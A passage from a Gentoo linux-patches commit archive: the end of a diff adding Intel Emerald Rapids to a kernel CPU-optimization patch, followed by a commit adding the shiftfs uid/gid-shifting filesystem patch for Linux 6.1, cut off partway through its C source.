 @@ -165,7 +165,7 @@ config MK6
  	  flags to GCC.
-
+ 
  config MK7
 -	bool "Athlon/Duron/K7"
 +	bool "AMD Athlon/Duron/K7"
@@ -130,7 +129,7 @@ index 542377cd419d..08d887d1220d 100644
  	  Select this for an AMD Athlon K7-family processor.  Enables use of
 @@ -173,12 +173,106 @@ config MK7
  	  flags to GCC.
-
+ 
  config MK8
 -	bool "Opteron/Athlon64/Hammer/K8"
 +	bool "AMD Opteron/Athlon64/Hammer/K8"
@@ -138,7 +137,7 @@ index 542377cd419d..08d887d1220d 100644
  	  Select this for an AMD Opteron or Athlon64 Hammer-family processor.
  	  Enables use of some extended instructions, and passes appropriate
  	  optimization flags to GCC.
-
+ 
 +config MK8SSE3
 +	bool "AMD Opteron/Athlon64/Hammer/K8 with SSE3"
 +	help
@@ -227,7 +226,7 @@ index 542377cd419d..08d887d1220d 100644
 +
 +config MZEN4
 +	bool "AMD Zen 4"
-+	depends on (CC_IS_GCC && GCC_VERSION >= 130000) || (CC_IS_CLANG && CLANG_VERSION >= 150500)
++	depends on (CC_IS_GCC && GCC_VERSION >= 130000) || (CC_IS_CLANG && CLANG_VERSION >= 160000)
 +	help
 +	  Select this for AMD Family 19h Zen 4 processors.
 +
@@ -238,26 +237,26 @@ index 542377cd419d..08d887d1220d 100644
  	depends on X86_32
 @@ -270,7 +364,7 @@ config MPSC
  	  in /proc/cpuinfo. Family 15 is an older Xeon, Family 6 a newer one.
-
+ 
  config MCORE2
 -	bool "Core 2/newer Xeon"
 +	bool "Intel Core 2"
  	help
-
+ 
  	  Select this for Intel Core 2 and newer Core 2 Xeons (Xeon 51xx and
 @@ -278,6 +372,8 @@ config MCORE2
  	  family in /proc/cpuinfo. Newer ones have 6 and older ones 15
  	  (not a typo)
-
+ 
 +	  Enables -march=core2
 +
  config MATOM
  	bool "Intel Atom"
  	help
-@@ -287,6 +383,202 @@ config MATOM
+@@ -287,6 +383,212 @@ config MATOM
  	  accordingly optimized code. Use a recent GCC with specific Atom
  	  support in order to fully benefit from selecting this option.
-
+ 
 +config MNEHALEM
 +	bool "Intel Nehalem"
 +	select X86_P6_NOP
@@ -410,7 +409,7 @@ index 542377cd419d..08d887d1220d 100644
 +	select X86_P6_NOP
 +	help
 +
-+	  Select this for third-generation 10 nm process processors in the Sapphire Rapids family.
++	  Select this for fourth-generation 10 nm process processors in the Sapphire Rapids family.
 +
 +	  Enables -march=sapphirerapids
 +
@@ -453,14 +452,24 @@ index 542377cd419d..08d887d1220d 100644
 +	  Select this for fourteenth-generation processors in the Meteor Lake family.
 +
 +	  Enables -march=meteorlake
++
++config MEMERALDRAPIDS
++	bool "Intel Emerald Rapids"
++	depends on (CC_IS_GCC && GCC_VERSION > 130000) || (CC_IS_CLANG && CLANG_VERSION >= 150500)
++	select X86_P6_NOP
++	help
++
++	  Select this for fifth-generation 10 nm process processors in the Emerald Rapids family.
++
++	  Enables -march=emeraldrapids
 +
  config GENERIC_CPU
  	bool "Generic-x86-64"
  	depends on X86_64
-@@ -294,6 +586,50 @@ config GENERIC_CPU
+@@ -294,6 +596,50 @@ config GENERIC_CPU
  	  Generic x86-64 CPU.
  	  Run equally well on all x86-64 CPUs.
-
+ 
 +config GENERIC_CPU2
 +	bool "Generic-x86-64-v2"
 +	depends on (CC_IS_GCC && GCC_VERSION > 110000) || (CC_IS_CLANG && CLANG_VERSION >= 120000)
@@ -506,9 +515,9 @@ index 542377cd419d..08d887d1220d 100644
 +	  Enables -march=native
 +
  endchoice
-
+ 
  config X86_GENERIC
-@@ -318,9 +654,17 @@ config X86_INTERNODE_CACHE_SHIFT
+@@ -318,9 +664,17 @@ config X86_INTERNODE_CACHE_SHIFT
  config X86_L1_CACHE_SHIFT
  	int
  	default "7" if MPENTIUM4 || MPSC
@@ -519,23 +528,23 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL \
 +	|| MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
 +	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE \
-+	|| MNATIVE_INTEL || MNATIVE_AMD || X86_GENERIC || GENERIC_CPU || GENERIC_CPU2 || GENERIC_CPU3 \
-+	|| GENERIC_CPU4
++	|| MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD || X86_GENERIC || GENERIC_CPU || GENERIC_CPU2 \
++	|| GENERIC_CPU3 || GENERIC_CPU4
  	default "4" if MELAN || M486SX || M486 || MGEODEGX1
 -	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
 +	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII \
 +	|| MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
-
+ 
  config X86_F00F_BUG
  	def_bool y
-@@ -332,15 +676,27 @@ config X86_INVD_BUG
-
+@@ -332,15 +686,27 @@ config X86_INVD_BUG
+ 
  config X86_ALIGNMENT_16
  	def_bool y
 -	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC || M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
 +	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC \
 +	|| M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
-
+ 
  config X86_INTEL_USERCOPY
  	def_bool y
 -	depends on MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M586MMX || X86_GENERIC || MK8 || MK7 || MEFFICEON || MCORE2
@@ -543,8 +552,8 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MK8 || MK7 || MEFFICEON || MCORE2 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
 +	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
-+	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL
-
++	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL
+ 
  config X86_USE_PPRO_CHECKSUM
  	def_bool y
 -	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MK8 || MVIAC3_2 || MVIAC7 || MEFFICEON || MGEODE_LX || MCORE2 || MATOM
@@ -555,11 +564,11 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE \
 +	|| MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE \
 +	|| MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
-+	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD
-
++	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD
+ 
  #
  # P6_NOPs are a relatively minor optimization that require a family >=
-@@ -356,32 +712,62 @@ config X86_USE_PPRO_CHECKSUM
+@@ -356,32 +722,63 @@ config X86_USE_PPRO_CHECKSUM
  config X86_P6_NOP
  	def_bool y
  	depends on X86_64
@@ -567,8 +576,9 @@ index 542377cd419d..08d887d1220d 100644
 +	depends on (MCORE2 || MPENTIUM4 || MPSC || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE \
 +	|| MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE \
-+	|| MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL)
-
++	|| MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS \
++	|| MNATIVE_INTEL)
+ 
  config X86_TSC
  	def_bool y
 -	depends on (MWINCHIP3D || MCRUSOE || MEFFICEON || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || MK8 || MVIAC3_2 || MVIAC7 || MGEODEGX1 || MGEODE_LX || MCORE2 || MATOM) || X86_64
@@ -578,9 +588,9 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM \
 +	|| MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL \
 +	|| MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
-+	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL \
-+	|| MNATIVE_AMD) || X86_64
-
++	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS \
++	|| MNATIVE_INTEL || MNATIVE_AMD) || X86_64
+ 
  config X86_CMPXCHG64
  	def_bool y
 -	depends on X86_PAE || X86_64 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586TSC || M586MMX || MATOM || MGEODE_LX || MGEODEGX1 || MK6 || MK7 || MK8
@@ -590,8 +600,8 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS \
 +	|| MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE \
 +	|| MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
-+	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD
-
++	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD
+ 
  # this should be set for all -march=.. options where the compiler
  # generates cmov.
  config X86_CMOV
@@ -603,8 +613,8 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
 +	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
-+	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD)
-
++	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD)
+ 
  config X86_MINIMUM_CPU_FAMILY
  	int
  	default "64" if X86_64
@@ -619,20 +629,20 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MNATIVE_INTEL || MNATIVE_AMD)
  	default "5" if X86_32 && X86_CMPXCHG64
  	default "4"
-
+ 
  config X86_DEBUGCTLMSR
  	def_bool y
 -	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 || M486SX || M486) && !UML
 +	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 \
 +	|| M486SX || M486) && !UML
-
+ 
  config IA32_FEAT_CTL
  	def_bool y
 diff --git a/arch/x86/Makefile b/arch/x86/Makefile
-index bafbd905e6e7..7fae52788560 100644
+index 415a5d138de4..17b1e039d955 100644
 --- a/arch/x86/Makefile
 +++ b/arch/x86/Makefile
-@@ -150,8 +150,47 @@ else
+@@ -151,8 +151,48 @@ else
          # FIXME - should be integrated in Makefile.cpu (Makefile_32.cpu)
          cflags-$(CONFIG_MK8)		+= -march=k8
          cflags-$(CONFIG_MPSC)		+= -march=nocona
@@ -676,17 +686,18 @@ index bafbd905e6e7..7fae52788560 100644
 +        cflags-$(CONFIG_MALDERLAKE) 	+= -march=alderlake
 +        cflags-$(CONFIG_MRAPTORLAKE) 	+= -march=raptorlake
 +        cflags-$(CONFIG_MMETEORLAKE) 	+= -march=meteorlake
++        cflags-$(CONFIG_MEMERALDRAPIDS)	+= -march=emeraldrapids
 +        cflags-$(CONFIG_GENERIC_CPU2) 	+= -march=x86-64-v2
 +        cflags-$(CONFIG_GENERIC_CPU3) 	+= -march=x86-64-v3
 +        cflags-$(CONFIG_GENERIC_CPU4) 	+= -march=x86-64-v4
          cflags-$(CONFIG_GENERIC_CPU)	+= -mtune=generic
          KBUILD_CFLAGS += $(cflags-y)
-
+ 
 diff --git a/arch/x86/include/asm/vermagic.h b/arch/x86/include/asm/vermagic.h
-index 75884d2cdec3..18021e8c0c28 100644
+index 75884d2cdec3..02c1386eb653 100644
 --- a/arch/x86/include/asm/vermagic.h
 +++ b/arch/x86/include/asm/vermagic.h
-@@ -17,6 +17,52 @@
+@@ -17,6 +17,54 @@
  #define MODULE_PROC_FAMILY "586MMX "
  #elif defined CONFIG_MCORE2
  #define MODULE_PROC_FAMILY "CORE2 "
@@ -736,10 +747,12 @@ index 75884d2cdec3..18021e8c0c28 100644
 +#define MODULE_PROC_FAMILY "RAPTORLAKE "
 +#elif defined CONFIG_MMETEORLAKE
 +#define MODULE_PROC_FAMILY "METEORLAKE "
++#elif defined CONFIG_MEMERALDRAPIDS
++#define MODULE_PROC_FAMILY "EMERALDRAPIDS "
  #elif defined CONFIG_MATOM
  #define MODULE_PROC_FAMILY "ATOM "
  #elif defined CONFIG_M686
-@@ -35,6 +81,32 @@
+@@ -35,6 +83,32 @@
  #define MODULE_PROC_FAMILY "K7 "
  #elif defined CONFIG_MK8
  #define MODULE_PROC_FAMILY "K8 "
@@ -772,5 +785,5 @@ index 75884d2cdec3..18021e8c0c28 100644
  #elif defined CONFIG_MELAN
  #define MODULE_PROC_FAMILY "ELAN "
  #elif defined CONFIG_MCRUSOE
---
-2.38.1
+-- 
+2.39.0


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-26 18:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-26 18:16 UTC (permalink / raw
  To: gentoo-commits

commit:     2448ffe116c8b8e53e668328ed3291d789dd7285
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Feb 26 18:16:47 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Feb 26 18:16:47 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2448ffe1

Add shiftfs

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                       |    4 +
 5000_shiftfs-6.1-2023-01-31.patch | 6554 +++++++++++++++++++++++++++++++++++++
 2 files changed, 6558 insertions(+)

diff --git a/0000_README b/0000_README
index 4604bf4f..c6d94abc 100644
--- a/0000_README
+++ b/0000_README
@@ -143,6 +143,10 @@ Patch:  4567_distro-Gentoo-Kconfig.patch
 From:   Tom Wijsman <TomWij@gentoo.org>
 Desc:   Add Gentoo Linux support config settings and defaults.
 
+Patch:  5000_shiftfs-6.1-2023-01-31.patch
+From:   https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/unstable
+Desc:   Kernel module that provides a kernel filesystem for uid/gid shifting
+
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.

diff --git a/5000_shiftfs-6.1-2023-01-31.patch b/5000_shiftfs-6.1-2023-01-31.patch
new file mode 100644
index 00000000..a5b40429
--- /dev/null
+++ b/5000_shiftfs-6.1-2023-01-31.patch
@@ -0,0 +1,6554 @@
+From b554e3101fdc94969141491a4234b3c931683b5c Mon Sep 17 00:00:00 2001
+From: James Bottomley <James.Bottomley@HansenPartnership.com>
+Date: Thu, 4 Apr 2019 15:39:11 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: uid/gid shifting bind mount
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
+
+This allows any subtree to be uid/gid shifted and bound elsewhere.  It
+does this by operating simlarly to overlayfs.  Its primary use is for
+shifting the underlying uids of filesystems used to support
+unpriviliged (uid shifted) containers.  The usual use case here is
+that the container is operating with an uid shifted unprivileged root
+but sometimes needs to make use of or work with a filesystem image
+that has root at real uid 0.
+
+The mechanism is to allow any subordinate mount namespace to mount a
+shiftfs filesystem (by marking it FS_USERNS_MOUNT) but only allowing
+it to mount marked subtrees (using the -o mark option as root).  Once
+mounted, the subtree is mapped via the super block user namespace so
+that the interior ids of the mounting user namespace are the ids
+written to the filesystem.
+
+Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
+[ saf: use designated initializers for path declarations to fix errors
+  with struct randomization ]
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+[update: port to 5.0]
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/Kconfig                 |   8 +
+ fs/Makefile                |   1 +
+ fs/shiftfs.c               | 780 +++++++++++++++++++++++++++++++++++++
+ include/uapi/linux/magic.h |   2 +
+ 4 files changed, 791 insertions(+)
+ create mode 100644 fs/shiftfs.c
+
+diff --git a/fs/Kconfig b/fs/Kconfig
+index 2685a4d0d353..b53bece1e940 100644
+--- a/fs/Kconfig
++++ b/fs/Kconfig
+@@ -128,6 +128,14 @@ source "fs/autofs/Kconfig"
+ source "fs/fuse/Kconfig"
+ source "fs/overlayfs/Kconfig"
+ 
++config SHIFT_FS
++	tristate "UID/GID shifting overlay filesystem for containers"
++	help
++	  This filesystem can overlay any mounted filesystem and shift
++	  the uid/gid the files appear at.  The idea is that
++	  unprivileged containers can use this to mount root volumes
++	  using this technique.
++
+ menu "Caches"
+ 
+ source "fs/netfs/Kconfig"
+diff --git a/fs/Makefile b/fs/Makefile
+index 4dea17840761..628632dcb9b1 100644
+--- a/fs/Makefile
++++ b/fs/Makefile
+@@ -137,3 +137,4 @@ obj-$(CONFIG_EFIVAR_FS)		+= efivarfs/
+ obj-$(CONFIG_EROFS_FS)		+= erofs/
+ obj-$(CONFIG_VBOXSF_FS)		+= vboxsf/
+ obj-$(CONFIG_ZONEFS_FS)		+= zonefs/
++obj-$(CONFIG_SHIFT_FS)		+= shiftfs.o
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+new file mode 100644
+index 000000000000..f7cada126daa
+--- /dev/null
++++ b/fs/shiftfs.c
+@@ -0,0 +1,780 @@
++#include <linux/cred.h>
++#include <linux/mount.h>
++#include <linux/file.h>
++#include <linux/fs.h>
++#include <linux/namei.h>
++#include <linux/module.h>
++#include <linux/kernel.h>
++#include <linux/magic.h>
++#include <linux/parser.h>
++#include <linux/seq_file.h>
++#include <linux/statfs.h>
++#include <linux/slab.h>
++#include <linux/user_namespace.h>
++#include <linux/uidgid.h>
++#include <linux/xattr.h>
++
++struct shiftfs_super_info {
++	struct vfsmount *mnt;
++	struct user_namespace *userns;
++	bool mark;
++};
++
++static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
++				       struct dentry *dentry);
++
++enum {
++	OPT_MARK,
++	OPT_LAST,
++};
++
++/* global filesystem options */
++static const match_table_t tokens = {
++	{ OPT_MARK, "mark" },
++	{ OPT_LAST, NULL }
++};
++
++static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
++{
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct cred *cred = prepare_creds();
++
++	if (!cred)
++		return NULL;
++
++	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
++	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
++	put_user_ns(cred->user_ns);
++	cred->user_ns = get_user_ns(ssi->userns);
++
++	return cred;
++}
++
++static const struct cred *shiftfs_new_creds(const struct cred **newcred,
++					    struct super_block *sb)
++{
++	const struct cred *cred = shiftfs_get_up_creds(sb);
++
++	*newcred = cred;
++
++	if (cred)
++		cred = override_creds(cred);
++	else
++		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
++
++	return cred;
++}
++
++static void shiftfs_old_creds(const struct cred *oldcred,
++			      const struct cred **newcred)
++{
++	if (!*newcred)
++		return;
++
++	revert_creds(oldcred);
++	put_cred(*newcred);
++}
++
++static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
++{
++	char *p;
++	substring_t args[MAX_OPT_ARGS];
++
++	ssi->mark = false;
++
++	while ((p = strsep(&options, ",")) != NULL) {
++		int token;
++
++		if (!*p)
++			continue;
++
++		token = match_token(p, tokens, args);
++		switch (token) {
++		case OPT_MARK:
++			ssi->mark = true;
++			break;
++		default:
++			return -EINVAL;
++		}
++	}
++	return 0;
++}
++
++static void shiftfs_d_release(struct dentry *dentry)
++{
++	struct dentry *real = dentry->d_fsdata;
++
++	dput(real);
++}
++
++static struct dentry *shiftfs_d_real(struct dentry *dentry,
++				     const struct inode *inode)
++{
++	struct dentry *real = dentry->d_fsdata;
++
++	if (unlikely(real->d_flags & DCACHE_OP_REAL))
++		return real->d_op->d_real(real, real->d_inode);
++
++	return real;
++}
++
++static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++
++	if (d_unhashed(real))
++		return 0;
++
++	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
++		return 1;
++
++	return real->d_op->d_weak_revalidate(real, flags);
++}
++
++static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int ret;
++
++	if (d_unhashed(real))
++		return 0;
++
++	/*
++	 * inode state of underlying changed from positive to negative
++	 * or vice versa; force a lookup to update our view
++	 */
++	if (d_is_negative(real) != d_is_negative(dentry))
++		return 0;
++
++	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
++		return 1;
++
++	ret = real->d_op->d_revalidate(real, flags);
++
++	if (ret == 0 && !(flags & LOOKUP_RCU))
++		d_invalidate(real);
++
++	return ret;
++}
++
++static const struct dentry_operations shiftfs_dentry_ops = {
++	.d_release	= shiftfs_d_release,
++	.d_real		= shiftfs_d_real,
++	.d_revalidate	= shiftfs_d_revalidate,
++	.d_weak_revalidate = shiftfs_d_weak_revalidate,
++};
++
++static int shiftfs_readlink(struct dentry *dentry, char __user *data,
++			    int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++	const struct inode_operations *iop = real->d_inode->i_op;
++
++	if (iop->readlink)
++		return iop->readlink(real, data, flags);
++
++	return -EINVAL;
++}
++
++static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
++				    struct delayed_call *done)
++{
++	if (dentry) {
++		struct dentry *real = dentry->d_fsdata;
++		struct inode *reali = real->d_inode;
++		const struct inode_operations *iop = reali->i_op;
++		const char *res = ERR_PTR(-EPERM);
++
++		if (iop->get_link)
++			res = iop->get_link(real, reali, done);
++
++		return res;
++	} else {
++		/* RCU lookup not supported */
++		return ERR_PTR(-ECHILD);
++	}
++}
++
++static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
++			    const char *name, const void *value,
++			    size_t size, int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err = -EOPNOTSUPP;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_setxattr(real, name, value, size, flags);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_xattr_get(const struct xattr_handler *handler,
++			     struct dentry *dentry, struct inode *inode,
++			     const char *name, void *value, size_t size)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_getxattr(real, name, value, size);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
++				 size_t size)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_listxattr(real, list, size);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_removexattr(struct dentry *dentry, const char *name)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_removexattr(real, name);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_xattr_set(const struct xattr_handler *handler,
++			     struct dentry *dentry, struct inode *inode,
++			     const char *name, const void *value, size_t size,
++			     int flags)
++{
++	if (!value)
++		return shiftfs_removexattr(dentry, name);
++	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
++}
++
++static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
++{
++	struct inode *reali;
++
++	if (!dentry)
++		return;
++
++	reali = dentry->d_inode;
++
++	if (!reali->i_op->get_link)
++		inode->i_opflags |= IOP_NOFOLLOW;
++
++	inode->i_mapping = reali->i_mapping;
++	inode->i_private = dentry;
++}
++
++static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
++			       umode_t mode, const char *symlink,
++			       struct dentry *hardlink, bool excl)
++{
++	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
++	struct inode *reali = real->d_inode, *newi;
++	const struct inode_operations *iop = reali->i_op;
++	int err;
++	const struct cred *oldcred, *newcred;
++	bool op_ok = false;
++
++	if (hardlink) {
++		op_ok = iop->link;
++	} else {
++		switch (mode & S_IFMT) {
++		case S_IFDIR:
++			op_ok = iop->mkdir;
++			break;
++		case S_IFREG:
++			op_ok = iop->create;
++			break;
++		case S_IFLNK:
++			op_ok = iop->symlink;
++		}
++	}
++	if (!op_ok)
++		return -EINVAL;
++
++
++	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
++	if (!newi)
++		return -ENOMEM;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++
++	inode_lock_nested(reali, I_MUTEX_PARENT);
++
++	err = -EINVAL;		/* shut gcc up about uninit var */
++	if (hardlink) {
++		struct dentry *realhardlink = hardlink->d_fsdata;
++
++		err = vfs_link(realhardlink, reali, new, NULL);
++	} else {
++		switch (mode & S_IFMT) {
++		case S_IFDIR:
++			err = vfs_mkdir(reali, new, mode);
++			break;
++		case S_IFREG:
++			err = vfs_create(reali, new, mode, excl);
++			break;
++		case S_IFLNK:
++			err = vfs_symlink(reali, new, symlink);
++		}
++	}
++
++	shiftfs_old_creds(oldcred, &newcred);
++
++	if (err)
++		goto out_dput;
++
++	shiftfs_fill_inode(newi, new);
++
++	d_instantiate(dentry, newi);
++
++	new = NULL;
++	newi = NULL;
++
++ out_dput:
++	dput(new);
++	iput(newi);
++	inode_unlock(reali);
++
++	return err;
++}
++
++static int shiftfs_create(struct inode *dir, struct dentry *dentry,
++			  umode_t mode,  bool excl)
++{
++	mode |= S_IFREG;
++
++	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
++}
++
++static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
++			 umode_t mode)
++{
++	mode |= S_IFDIR;
++
++	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
++}
++
++static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
++			struct dentry *dentry)
++{
++	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
++}
++
++static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
++			   const char *symlink)
++{
++	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
++}
++
++static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
++{
++	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
++	struct inode *reali = real->d_inode;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	inode_lock_nested(reali, I_MUTEX_PARENT);
++
